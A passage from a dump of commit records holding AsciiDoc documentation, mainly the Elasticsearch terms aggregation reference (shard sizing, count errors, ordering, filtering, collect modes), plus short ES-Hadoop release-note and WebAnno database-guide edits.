TESTRESPONSE[s\/\\.\\.\\.\/\/]\n<1> an upper bound of the error on the document counts for each term, see <<search-aggregations-bucket-terms-aggregation-approximate-counts,below>>\n<2> when there are lots of unique terms, Elasticsearch only returns the top terms; this number is the sum of the document counts for all buckets that are not part of the response\n<3> the list of the top buckets, the meaning of `top` being defined by the <<search-aggregations-bucket-terms-aggregation-order,order>>\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can\nchange this default behaviour by setting the `size` parameter.\n\n[[search-aggregations-bucket-terms-aggregation-size]]\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned).\n\nNOTE: If you want to retrieve **all** terms or all combinations of terms in a nested `terms` aggregation\n you should use the <<search-aggregations-bucket-composite-aggregation,Composite>> aggregation which\n allows to paginate over all possible terms rather than setting a size greater than the cardinality of the field in the\n `terms` aggregation. The `terms` aggregation is meant to return the `top` terms and does not allow pagination.\n\n[[search-aggregations-bucket-terms-aggregation-approximate-counts]]\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. Once all the shards responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will\n override it and reset it to be equal to `size`.\n\n\nThe default `shard_size` will be `size` if the search request needs to go to a single shard, and `(size * 1.5 + 10)`\notherwise.\n\n==== Calculating Document Count Error\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard. For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\n==== Per bucket document count error\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5,\n \"show_term_doc_count_error\": true\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\n\nThis shows an error value for each term returned by the aggregation which represents the 'worst case' error in the document count\nand can be useful when deciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for\nthe last term returned by all shards which did not return the term. In the example above the error in the document count for Product C\nwould be 15 as Shard B was the only shard not to return the term and the document count of the last term it did return was 15.\nThe actual document count of Product C was 54 so the document count was only actually off by 4 even though the worst case was that\nit would be off by 15. Product A, however has an error of 0 for its document count, since every shard returned it we can be confident\nthat the count returned is accurate.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n[[search-aggregations-bucket-terms-aggregation-order]]\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is possible to change this behaviour as documented below:\n\nWARNING: Sorting by ascending `_count` or by sub aggregation is discouraged as it increases the\n<<search-aggregations-bucket-terms-aggregation-approximate-counts,error>> on document counts.\nIt is fine when a single shard is queried, or when the field that is being aggregated was used\nas a routing key at index time: in these cases results will be accurate since shards have disjoint\nvalues. However otherwise, errors are unbounded. One particular case that could still be useful\nis sorting by <<search-aggregations-metrics-min-aggregation,`min`>> or\n<<search-aggregations-metrics-max-aggregation,`max`>> aggregation: counts will not be accurate\nbut at least the top buckets will be correctly picked.\n\nOrdering the buckets by their doc `_count` in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_key\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\ndeprecated[6.0.0, Use `_key` instead of `_term` to order buckets by their term]\n\nOrdering the buckets by single value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"max_play_count\" : \"desc\" }\n },\n \"aggs\" : {\n \"max_play_count\" : { \"max\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets by multi value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"playback_stats.max\" : \"desc\" }\n },\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[NOTE]\n.Pipeline aggs cannot be used for sorting\n=======================================\n\n<<search-aggregations-pipeline,Pipeline aggregations>> are run during the\nreduce phase after all other aggregations have already completed. For this\nreason, they cannot be used for ordering.\n\n=======================================\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregations path are of a single-bucket type, where the last aggregation in the path may either be a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`),\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n\/\/ https:\/\/en.wikipedia.org\/wiki\/Extended_Backus%E2%80%93Naur_Form\n[source,ebnf]\n--------------------------------------------------\nAGG_SEPARATOR = '>' ;\nMETRIC_SEPARATOR = '.' ;\nAGG_NAME = <the name of the aggregation> ;\nMETRIC = <the name of the metric (in case of multi-value metrics aggregation)> ;\nPATH = <AGG_NAME> [ <AGG_SEPARATOR>, <AGG_NAME> ]* [ <METRIC_SEPARATOR>, <METRIC> ] ;\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : { \"rock>playback_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artist's countries buckets based on the average play count among the rock songs.\n\nMultiple criteria can be used to order the buckets by providing an array of order criteria such as the following:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : [ { \"rock>playback_stats.avg\" : \"desc\" }, { \"_count\" : \"desc\" } ]\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artist's countries buckets based on the average play count among the rock songs and then by\ntheir `doc_count` in descending order.\n\nNOTE: In the event that two buckets share the same values for all order criteria the bucket's term value is used as a\ntie-breaker in ascending alphabetical order to prevent non-deterministic ordering of buckets.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\n`shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of\n the returned terms which have a document count of zero might only belong to deleted documents or documents\n from other types, so there is no warranty that a `match_all` query would find a positive document count for\n those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"source\": \"doc['genre'].value\",\n \"lang\": \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis will interpret the `script` parameter as an `inline` script with the default script language and no script parameters. To use a stored script use the following syntax:\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nPOST \/_scripts\/my_script\n{\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc[params.field].value\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"id\": \"my_script\",\n \"params\": {\n \"field\": \"genre\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n==== Value Script\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"script\" : {\n \"source\" : \"'Genre: ' +_value\",\n \"lang\" : \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on regular expression strings or arrays of exact values. Additionally,\n`include` clauses can filter using `partition` expressions.\n\n===== Filtering Values with regular expressions\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will no be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. When\nboth are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`.\n\nThe syntax is the same as <<regexp-syntax,regexp queries>>.\n\n===== Filtering Values with exact values\n\nFor matching based on exact values the `include` and `exclude` parameters can simply take an array of\nstrings that represent the terms as they are found in the index:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"JapaneseCars\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"include\" : [\"mazda\", \"honda\"]\n }\n },\n \"ActiveCarManufacturers\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"exclude\" : [\"rover\", \"jensen\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n===== Filtering Values with partitions\n\nSometimes there are too many unique terms to process in a single request\/response pair so \nit can be useful to break the analysis up into multiple requests.\nThis can be achieved by grouping the field's values into a number of partitions at query-time and processing\nonly one partition in each request.\nConsider this request which is looking for accounts that have not logged any access recently:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"size\": 0,\n \"aggs\": {\n \"expired_sessions\": {\n \"terms\": {\n \"field\": \"account_id\",\n \"include\": {\n \"partition\": 0,\n \"num_partitions\": 20\n },\n \"size\": 10000,\n \"order\": {\n \"last_access\": \"asc\"\n }\n },\n \"aggs\": {\n \"last_access\": {\n \"max\": {\n \"field\": \"access_date\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis request is finding the last logged access date for a subset of customer accounts because we\nmight want to expire some customer accounts who haven't been seen for a long while.\nThe `num_partitions` setting has requested that the unique account_ids are organized evenly into twenty\npartitions (0 to 19). and the `partition` setting in this request filters to only consider account_ids falling \ninto partition 0. Subsequent requests should ask for partitions 1 then 2 etc to complete the expired-account analysis.\n\nNote that the `size` setting for the number of results returned needs to be tuned with the `num_partitions`. \nFor this particular account-expiration example the process for balancing values for `size` and `num_partitions` would be as follows:\n\n1. Use the `cardinality` aggregation to estimate the total number of unique account_id values\n2. Pick a value for `num_partitions` to break the number from 1) up into more manageable chunks\n3. Pick a `size` value for the number of responses we want from each partition\n4. Run a test request\n\nIf we have a circuit-breaker error we are trying to do too much in one request and must increase `num_partitions`.\nIf the request was successful but the last account ID in the date-sorted test response was still an account we might want to \nexpire then we may be missing accounts of interest and have set our numbers too low. We must either \n\n* increase the `size` parameter to return more results per partition (could be heavy on memory) or\n* increase the `num_partitions` to consider less accounts per request (could increase overall processing time as we need to make more requests)\n\nUltimately this is a balancing act between managing the Elasticsearch resources required to process a single request and the volume\nof requests that the client application must issue to complete a task.\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Global ordinals\nresults in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields. This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n\n==== Collect mode\n\nDeferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then any pruning occurs.\nIn some scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nEven though the number of actors may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets\nduring calculation - a single actor can produce n\u00b2 buckets where n is the number of actors. The sane option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the `depth_first` mode.\n\nNOTE: The `breadth_first` is the default mode for fields with a cardinality bigger than the requested size or when the cardinality is unknown (numeric fields or scripts for instance).\nIt is possible to override the default heuristic and to provide a collect mode directly in the request:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\" <1>\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> the possible values are `breadth_first` and `depth_first`\n\nWhen using `breadth_first` mode the set of documents that fall into the uppermost buckets are\ncached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: Nested aggregations such as `top_hits` which require access to score information under an aggregation that uses the `breadth_first`\ncollection mode need to replay the query on the second pass but only for the documents belonging to the top buckets.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using global ordinals of the field and allocating one bucket per global ordinal (`global_ordinals`)\n\nElasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured.\n\n`global_ordinals` is the default option for `keyword` field, it uses global ordinals to allocates buckets dynamically\nso memory usage is linear to the number of values of the documents that are part of the aggregation scope.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode\nis significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> The possible values are `map`, `global_ordinals`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n\n==== Missing value\n\nThe `missing` parameter defines how documents that are missing a value should be treated.\nBy default they will be ignored but it is also possible to treat them as if they\nhad a value.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"missing\": \"N\/A\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N\/A`.\n\n==== Mixing field types\n\nWARNING: When aggregating on multiple indices the type of the aggregated field may not be the same in all indices.\nSome types are compatible with each other (`integer` and `long` or `float` and `double`) but when the types are a mix\nof decimal and non-decimal number the terms aggregation will promote the non-decimal numbers to decimal numbers.\nThis can result in a loss of precision in the bucket values.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fcec63bca3b6718739033cf114dc488f9653bd47","subject":"Fixing doc error","message":"Fixing doc error\n","repos":"elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/5.2.1.adoc","new_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/5.2.1.adoc","new_contents":"[[eshadoop-5.2.1]]\n== Elasticsearch for Apache Hadoop version 5.2.1\nFebruary 14, 2017\n\nES-Hadoop 5.2.1 is a version compatibility release, tested specifically against Elasticsearch 5.2.1.\n\n[[docs-5.2.1]]\n=== Documentation\n* Updated links that point to the ES reference documentation to use version 5.2 instead of 2.0.","old_contents":"[[eshadoop-5.2.1]]\n== Elasticsearch for Apache Hadoop version 5.2.1\nFebruary 14, 2017\n\nES-Hadoop 5.2.1 is a version compatibility release, tested specifically against Elasticsearch 5.2.1.\n\n[[docs-5.1.2]]\n=== Documentation\n* Updated links that point to the ES reference documentation to use version 5.2 instead of 2.0.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d403515f983f1b66bfaf2435820d021bc437d0f","subject":"No issue. Fixed table.","message":"No issue. Fixed table.\n","repos":"webanno\/webanno,webanno\/webanno,webanno\/webanno,webanno\/webanno","old_file":"webanno-doc\/src\/main\/asciidoc\/admin-guide\/database.adoc","new_file":"webanno-doc\/src\/main\/asciidoc\/admin-guide\/database.adoc","new_contents":"\/\/ Copyright 2015\n\/\/ Ubiquitous Knowledge Processing (UKP) Lab and FG Language Technology\n\/\/ Technische Universit\u00e4t Darmstadt\n\/\/ \n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/ \n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/ \n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[sect_database]]\n== Database\n\nWebAnno uses an SQL database to store project and user data. \n\nWe test MySQL using a MySQL server. WebAnno uses by default an embedded HSQLDB database. However, we \nrecommend using the embedded database only for testing purposes. For production use, we recommend\nusing a MySQL server. The reason for this is, that:\n\n* we do more testing on the MySQL server and\n* in the past, we had cases where we described in-place upgrade procedures that required performing\n SQL commands to change the data model as part of the upgrade. We promise to try avoiding this in\n the future. However, in case we offer advice on fixing anything directly in the database, this\n advice will refer to a MySQL database.\n\nWe try to keep the data model simple, so there should be no significant requirements to the database\nbeing used. Theoretically, it should be possible to use any JDBC-compatible database after adding a\ncorresponding driver to the classpath and configuring WebAnno to use the driver in the\n`settings.properties` file.\n\nIf you plan to use UTF-8 encoding for project name and tagset\/tag name, make sure either of the following settings for MySQL databse\na) in the `settings.properties` file, make sure that `database.url` includes \n\n----\nuseUnicode=true&characterEncoding=UTF-8\n----\n\nb) change the `my.conf` MySQL databse configuration file to include the following line\n\n----\ncharacter-set-server = utf8\n----\n\n=== Using HSQLDB in production\n\nWebAnno displays a warning in the user interface when an embedded database is being used. In case\nthat you really want to run WebAnno with an embedded database in production, you probably want to\ndisable this warning. To do so, please add the following entry to the `settings.properties` file:\n\n----\nwarnings.embeddedDatabase=false\n----\n","old_contents":"\/\/ Copyright 2015\n\/\/ Ubiquitous Knowledge Processing (UKP) Lab and FG Language Technology\n\/\/ Technische Universit\u00e4t Darmstadt\n\/\/ \n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/ \n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/ \n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[sect_database]]\n== Database\n\nWebAnno uses an SQL database to store project and user data. \n\nWe test MySQL using a MySQL server. WebAnno uses by default an embedded HSQLDB database. However, we \nrecommend using the embedded database only for testing purposes. For production use, we recomment\nusing a MySQL server. The reason for this is, that:\n\n* we do more testing on the MySQL server and\n* in the past, we had cases where we described in-place upgrade procedures that required performing\n SQL commands to change the data model as part of the upgrade. We promise to try avoiding this in\n the future. However, in case we offer advice on fixing anything directly in the database, this\n advice will refer to a MySQL database.\n\nWe try to keep the data model simple, so there should be no significant requirements to the database\nbeing used. Theoretically, it should be possible to use any JDBC-compatible database after adding a\ncorresponding driver to the classpath and configuring WebAnno to use the driver in the\n`settings.properties` file.\n\nIf you plan to use UTF-8 encoding for project name and tagset\/tag name, make sure either of the following settings for MySQL databse\na) in the `settings.properties` file, make sure that `database.url` includes \n\n----\nuseUnicode=true&characterEncoding=UTF-8\n----\n\nb) change the `my.conf` MySQL databse configuration file to include the following line\n\n----\ncharacter-set-server = utf8\n----\n\n=== Using HSQLDB in production\n\nWebAnno displays a warning in the user interface when an embedded database is being used. In case\nthat you really want to run WebAnno with an embedded database in production, you probably want to\ndisable this warning. To do so, please add the following entry to the `settings.properties` file:\n\n----\nwarnings.embeddedDatabase=false\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a1257a52a7cd47636bea96e68f5adea5774ebe1","subject":"fix 